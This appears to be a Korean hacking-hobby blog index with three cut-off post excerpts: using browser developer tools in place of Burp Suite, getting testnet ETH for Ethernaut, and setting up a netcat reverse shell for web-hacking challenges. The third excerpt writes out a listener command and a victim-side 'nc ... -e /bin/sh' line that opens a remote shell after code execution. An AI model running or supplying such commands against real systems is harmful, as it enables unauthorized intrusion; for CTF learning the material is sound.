Burnnnnnnnnnny

웹해킹한지 언 1년차가 넘어가는 이 시점 내가 Burp Suite를 잘 안쓰는 이유를 설명하도록 하겠다.  Burp Suite의 기능을 개발자도구가 거의 대채할 수 있기 때문이다.물론 Burp Suite의 100%기능을 잘 모른다 근데 대충 Burp Suite의 repeater와 proxy 기능정도는 대충안다. 근데 이건 개발자도구로 쉽고 강력하게 대채를 할 수 있는게 proxy의 경우 중간에서 패킷을 조작하기 위해 사용한다. 개발자도구는 네트워크 탭에 간 패킷을 우클릭하면 fetch로 복사하기 기능이 있어 해당 기능에 body나 등등을 수정하고 요청하면 대채할 수 있다. 심지어 repeater의 경우 방금 이야기한 fetch에 for문등 반복문으로 하면 대채할 수 있다 ㅇㅇ;;아주 ez하게 해킹 할 수..

요즘 WEB3에 관심이 생겨서 메타마스크 지갑을 만들어봤다크롬 확장 프로그램으로 메타마스크 지갑을 만들어봤고 구글 클라우드한테 매일 0.05이더를 받을 수 있다. https://cloud.google.com/application/web3/faucet Web3 FaucetGet free testnet tokens for Web3 development. Use these tokens to deploy smart contracts, debug transactions, and experiment on EVM testnets.cloud.google.com ethernaut푸는데 이더가 조금 필요하니까 받아놓아야한다. ㅇㅇ;; 요즘 크립토 좀비로 솔리디티 언어 공부 중이고  https://ethernaut.open..

셸인지 쉘인지 그게 중요한가 싶지만 어찌됐든 웹해킹문제 풀 때 언젠간 쓸모 있을 거 같아 만들어 놓는다 ㅎㅎ구름 IDE에 들어가서 가입 후 컨테이너를 블랭크로 만든다. 그 뒤에 설정에 들어가 내부포트를 설정해준다.nc 설치apt-get install netcat (공격자) 포트 열기nc -lvp 내부포트 (희생자 서버)그리고 리버스 셸nc IP주소 외부포트-e /bin/sh 원격코드 실행이 된다면 유용하게 쓸 수 있을 거 같다.뭐 SSTI라던가 혹은 다른 RCE가 가능하다면 리버스 셸도 하나의 유용한 방법일 듯 리버스 셸은 기본이다 기본 ㅇㅇhttps://www.revshells.com/ Online - Reverse Shell GeneratorOnline Reverse Shell generator wi..